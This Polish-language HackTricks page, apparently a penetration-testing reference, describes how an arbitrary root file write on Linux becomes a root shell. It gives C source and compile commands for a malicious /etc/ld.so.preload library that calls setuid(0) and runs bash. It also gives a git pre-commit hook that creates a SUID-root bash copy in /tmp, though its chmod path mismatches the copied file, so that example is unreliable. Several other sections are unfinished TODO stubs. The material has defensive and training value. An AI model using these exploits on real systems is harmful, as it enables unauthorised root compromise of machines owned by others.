Dowolne zapisywanie plików do roota
Reading time: 2 minutes
tip
Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.
/etc/ld.so.preload
Ten plik działa jak zmienna środowiskowa LD_PRELOAD
, ale działa również w binarnych plikach SUID.
Jeśli możesz go utworzyć lub zmodyfikować, możesz po prostu dodać ścieżkę do biblioteki, która będzie ładowana z każdym wykonywanym plikiem binarnym.
Na przykład: echo "/tmp/pe.so" > /etc/ld.so.preload
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unlink("/etc/ld.so.preload");
setgid(0);
setuid(0);
system("/bin/bash");
}
//cd /tmp
//gcc -fPIC -shared -o pe.so pe.c -nostartfiles
Git hooks
Git hooks to skrypty, które są uruchamiane przy różnych zdarzeniach w repozytorium git, takich jak tworzenie commita, merge... Jeśli więc skrypt z uprawnieniami lub użytkownik wykonuje te akcje często i możliwe jest zapisywanie w folderze .git
, można to wykorzystać do privesc.
Na przykład, możliwe jest generowanie skryptu w repozytorium git w .git/hooks
, aby był zawsze wykonywany, gdy tworzony jest nowy commit:
echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/0xdf\nchown root:root /tmp/0xdf\nchmod 4777 /tmp/b' > pre-commit
chmod +x pre-commit
Cron & Time files
TODO
Service & Socket files
TODO
binfmt_misc
Plik znajdujący się w /proc/sys/fs/binfmt_misc
wskazuje, który plik binarny powinien wykonywać jaki typ plików. TODO: sprawdź wymagania, aby nadużyć tego do wykonania rev shell, gdy otwarty jest typ pliku.
tip
Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.